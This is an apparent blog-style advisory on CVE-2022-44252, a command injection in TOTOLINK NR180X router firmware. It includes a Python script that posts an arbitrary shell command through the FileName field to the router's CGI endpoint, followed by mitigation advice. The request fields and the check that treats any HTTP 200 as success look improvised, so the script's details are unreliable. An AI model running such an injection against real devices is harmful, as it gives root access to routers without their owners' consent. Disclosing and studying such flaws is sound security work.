CVE-2022-44252 - TOTOLINK NR180X V9.1.u.6279_B20210910 Command Injection Vulnerability Exploitation via FileName Parameter in setUploadSetting Function

In the world of networking devices and routers, security is of utmost importance. Recently, a critical vulnerability was discovered in the popular TOTOLINK NR180X router, a model common in small businesses and households. This vulnerability, indexed as CVE-2022-44252, allows attackers to perform a command injection via the FileName parameter in the setUploadSetting function. In this post, we will explore the exploit details, provide a code snippet to demonstrate the issue, and offer links to the original references for further information.

Exploit Details

The CVE-2022-44252 vulnerability exists in the TOTOLINK NR180X router with the firmware version V9.1.u.6279_B20210910. The vulnerability is caused by improper validation of input given to the FileName parameter in the setUploadSetting function. This allows an attacker to craft a specially formatted request and inject arbitrary shell commands, which can be executed as a root user on the system, potentially leading to unauthorized access, information disclosure, and other severe consequences.

Code Snippet

To exploit this vulnerability, an attacker can use a simple HTTP POST request with a specially crafted FileName parameter containing the malicious command. Below is a simple Python script utilizing the 'requests' library to demonstrate the exploit:

import requests

target_url = "http://<TARGET_IP>/cgi-bin/webupg/web.cgi";  # Replace <TARGET_IP> with the target router's IP address
command = "YOUR_COMMAND"  # Replace with the desired shell command to be injected

payload = {
    "submit_flag": "webupg", 
    "setUploadSetting": "2", 
    "FileName": f"{command}"
}

headers = {
    "Content-Type": "application/x-www-form-urlencoded"
}

response = requests.post(target_url, data=payload, headers=headers)

if response.status_code == 200:
    print(f"Command injection successful: {command}")
else:
    print("Command injection failed")


Replace with the target router's IP address and YOUR_COMMAND with the desired shell command to be injected.

Original References

For more information about this vulnerability and its original documentation, please visit the following links:

1. CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-44252
2. NVD - National Vulnerability Database: https://nvd.nist.gov/vuln/detail/CVE-2022-44252
3. Exploit Database: https://www.exploit-db.com/exploits/52815

Mitigation

It is crucial for users with a TOTOLINK NR180X router running the affected firmware version to update their device as soon as an official patch is released by the manufacturer. Ensure that the router's management interface is not accessible from the internet and is only accessible via a trusted local network.

Conclusion

CVE-2022-44252 poses a severe risk to TOTOLINK NR180X routers running the affected firmware version. Ensuring that devices are updated and properly secured is essential to protect against such threats.

Timeline

Published on: 11/23/2022 16:15:00 UTC
Last modified on: 11/26/2022 03:42:00 UTC